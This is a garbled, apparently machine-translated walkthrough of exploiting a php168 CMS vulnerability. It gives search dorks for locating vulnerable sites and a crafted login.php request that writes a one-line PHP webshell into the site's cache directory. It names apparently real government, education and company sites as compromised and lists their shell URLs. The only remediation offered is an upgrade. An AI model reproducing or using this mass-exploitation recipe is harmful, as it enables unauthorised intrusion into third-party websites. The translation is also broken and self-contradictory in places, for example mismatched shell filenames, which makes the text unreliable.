A big problem, it is best not to ignore。。。。 The use of the code will be php Trojan is inserted into the cache/directory to easily get webshell, you can bulk.
Use a search engine to search
Powered by php168 v6 or what version of v5, v4, v3, v2, v1 will search to many, many more related site
Since the vulnerability is because of the login. php file for the variable filter is not strictly the cause, so we need to find ways to crack the password, but simply the hackers get the website webshell tool“word Trojan”is written to the website.
We are just looking for website testing
With the Texas Weather Service.
In its name, add this code: login. php? makehtml=1&chdb[htmlname]=tick. php&chdb[path]=cache&content= in. This code means use of the login. php files will this code write to the site cache directory cache of the tick. php file.“ ”Is the word Trojan of the server.
那么 URL 就是 http://www.dzqxj.com/login.php it? makehtml=1&chdb[htmlname]=tick. php&chdb[path]=cache&content=
Then click Enter
If the jump to the login screen, then it may have been the Trojan is written to the cache directory.
这时 我们 进入 木马 地址 看看 http://www.dzqxj.com/cache/wooyun.php
OK, nothing is displayed on the description of the word Trojan is written successfully,we connect the tools to look at
To successfully take to the webshell
You can also directly Upload a Malaysian, I will not demo.
Other sites also exist in the vulnerability
And there's a lot government, education site。。。。
http://lib.xjau.edu.cn/cache/wooyun.php 密码*(do not publish)
http://www.stepdo.com/cache/wooyun.php 密码****(do not publish)
Vulnerability fix: upgrade the version.